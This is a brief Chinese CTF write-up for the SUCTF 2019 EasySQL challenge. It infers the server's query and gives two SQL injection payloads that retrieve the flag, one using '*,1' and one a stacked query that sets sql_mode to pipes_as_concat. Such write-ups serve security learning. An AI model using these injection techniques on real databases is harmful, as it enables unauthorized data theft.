Web-[SUCTF 2019]EasySQL

打开后显示如下：

payload为数字时有回显，为字符串时没有回显

看大佬的wp得知，此时的内置sql语句为sql=“select”.post[‘query’]."||flag from Flag";

解法一

当payload为*,1时，执行的sql语句为select *,1||flag from Flag
相当于select 1 from Flag

于是

得到flag

解法二（预期解法）

payload为1;set sql_mode=pipes_as_concat;select 1

此时执行的语句为

select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag

得到flag